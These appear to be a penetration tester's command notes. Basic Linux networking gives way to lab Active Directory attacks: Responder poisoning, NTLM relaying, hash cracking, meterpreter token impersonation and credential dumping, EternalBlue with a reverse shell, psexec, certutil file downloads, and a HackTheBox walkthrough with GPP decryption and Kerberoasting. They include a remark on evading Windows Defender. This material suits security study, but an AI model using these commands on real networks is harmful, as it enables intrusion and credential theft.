Commands
ifconfig
iwconfig
# ping normally works indefinitely
$ ping -c 1 192.168.1.254
# ^ ping with count of 1
$ arp -a
_gateway (10.0.2.2) at 52:54:00:12:35:02 [ether] on eth0
# -a Use alternate BSD style output format (with no fixed columns).
$ netstat -ano
# -a, --all
# Show both listening and non-listening sockets. With the --interfaces option,
# show interfaces that are not up
#
# --numeric, -n
# Show numerical addresses instead of trying to determine symbolic host, port or
# user names.
#
# -o, --timers
# Include information related to networking timers.
$ route # show / manipulate the IP routing table
# Print Router IP
$ ip route show | grep -i 'default via'| awk '{print $3 }'
$ tr -s ' ' <text.txt | cut -d ' ' -f4
# -s, --squeeze-repeats replace each input sequence of a repeated character
# that is listed in SET1 with a single occurrence
# of that character
adduser
locate
updatedb - update a database for locate
chmod +x
su
apt-purge
eog - photo viewer
$ hash -r
# Before getting happy with apt-get removes and installs. It's worthwhile to reset your bash cache.
# https://stackoverflow.com/questions/16237490/i-screwed-up-the-system-version-of-python-pip-on-ubuntu-12-10
# Linux --VMs will take much longer
hashcat -m 5600 hash.txt /root/rockyou.txt #NetNTLMv2
# Windows
..\hashcat-4.2.1>hashcat64.exe -m 5600 hash.txt rockyou.txt
python Responder.py -I eth0 -rdw
crackmapexec smb <ip range> -u Administrator -p 'P@$$word!' -d MARVEL
meterpreter > load incognito
meterpreter > list_tokens -u # users
meterpreter > list_tokens -g # group
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token MARVEL\\Administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > getuid
Server username: MARVEL\Administrator
meterpreter > shell
...
C:\Windows\system32>whoami
marvel\administrator
# with a meterpreter session running
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(post/multi/recon/local_exploit_suggester) > set session 1
msf5 post(post/multi/recon/local_exploit_suggester) > run
...
# enter session
msf5 > sessions 1
# check processes
meterpreter > ps
locate ntlmrelayx.py # it's in impacket
python ntlmrelayx.py -tf target.txt -smb2support
nmap -Pn -p445 --script=smb-vuln-ms17-010 <ip>
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > sysinfo
meterpreter > hashdump
meterpreter > shell
c:\Users\Administrator>arp -a
c:\Users\Administrator>route print
#check if machine is dual-homed. if two NICs, can pivot
# e.g. if on 10.10.10.X and 10.10.11.X
c:\Users\Administrator>netstat -ano
^C terminate channel -> back to meterpreter
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > load kiwi # this is x64
meterpreter > creds_all
meterpreter > wifi_list
root@kali:~/Security/HackTheBox/active# smbclient -L \\\\10.10.10.100\\
Enter WORKGROUP\root's password: # just pressed enter
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (3.1 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (9.4 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (12.5 KiloBytes/sec) (average 3.8 KiloBytes/sec)
root@kali:~/Security/HackTheBox/active# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
root@kali:~/Security/HackTheBox/active# cd /opt/impacket/examples/
root@kali:/opt/impacket/examples# python GetUserSPNs.py active.htb/SVC_TGS -dc-ip 10.10.10.100 -request
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password: # entered GPPstillStandingStrong2k18
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- -------------------------- --------------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2018-07-30 13:17:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$cfe6baaf6d9538cee9ab43897032e0fa$09198fe8a7f83682b4388efdc589cb1cda10227e9a60c7c35ea7d22c06d5a4bcda24ccaed5f93340a637fd28d7ccb66a72f389f5804de980f1994a7ff824ef17af26dd8c5c8a1c6d3455d0c7382b67d974316f7bf4b92f34a29f58a72b4379030b252d32db97ab5b11856163f11467818748522e3675dd450ba3aabbf50e48e1c4e30cbba5dc084f3d2c42046ce1a3479ec357f32dec622e2d53b0886dc80d9859cb884f5bde9ad9e04de3a5ea3fdf8ccbe85700be9d1482e6e8464432c72c3937d73a1d1a995e50551d7262f37449c04c646ebf4858ab7c9a2dc52cdcfad11dde4d1619edebee18b0720cd4d31a89183eee9ac7a271220ee5426150df7a13707dc6a87c8c9b5eb724b2c82d88b6bd291d32f2810f4739e2d2c85c5110438ccd638af22cf31cc3573f75c76bc3509e1ef8673850f1f6e5705d3eb562fce69bb0c14164ebada481efa673a48d03982b3e00aaec576abc5bbeb9f62aa10dbbe8db0457ad10a8dcd044ee16fe52f2982dc6b5209a6e21731183854f8f154202093a358c81aa374926a9bc4586511d2eb0cbb5e97a8128246b8c0fc25e10bb223caf955ef2d698c8b1b417e4586b5e023a223f977ec939a43e99506f582acca6310d465ec02562f76795bb9283e56cb3afc2eb6e6d035fedff593c385f0f55514499777141a01008b71b544bb94ea7bcbabb0576b4b668fd32ff7e83544d2ea00d9742ff25810d3b419afa77d132f4cc45cffe4c6ae87f0b39b0d8f4b9865745d731a70b1eeaf3dd5bae0003660e5eea6d9a905805080dd4918580a37245a50b8a5c2019c0134c727de350bcf4035efd6213e7ab3305023c725c4ec29299a04ef952564b2d380afb35a1f7f383fbe861068cfd5d45ce504991cb0084797505b5cd7ceb60f9901156964bea2c907c541d26dd379acec3ee27aa67d89dfdfa98c8833ccac102788ddbf9f01f29874b05f741f8a87ea5b7fd440da54e7c8f2938cb837ed800a917cff2ca69472a15227bf32e4ef0d95d20583d4bbf2f8650ade6ff94ba654a1e04c2ecfbd65e57e75e1f202b114effdad8d2c57cd30d5bc036749bcc55400cb4b18ccbd2529dd1c753f9da30cab6a87244d7b3217bad670e0417b4ad1c0eb1ca576ba963fdcb67adebe90df3697874ae19a990ce4b9a3e9ec0556cb74e0a4df654a583ea185c0dd1b41f175715a2f5b1ad2b60361885498f6645ba3f8a6309bf0085245092ef4edaa5fb6d67e6981045c657a0ce0f6104
# Windows Defender can block this, though there are ways to split files to bypass
# GRAB FILES - HTTP
C:\Users\fcastle>certutil -rulcache -f http://<ip>/secrets.txt secrets.txt
# GRAB FILES - FTP
C:\Users\fcastle>ftp <ip>
ftp> get <file>
msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.202.134
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
msf5 exploit(windows/smb/psexec) > set target 2
msf5 exploit(windows/smb/psexec) > run
...
meterpreter > cd c:\\users
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt
Last updated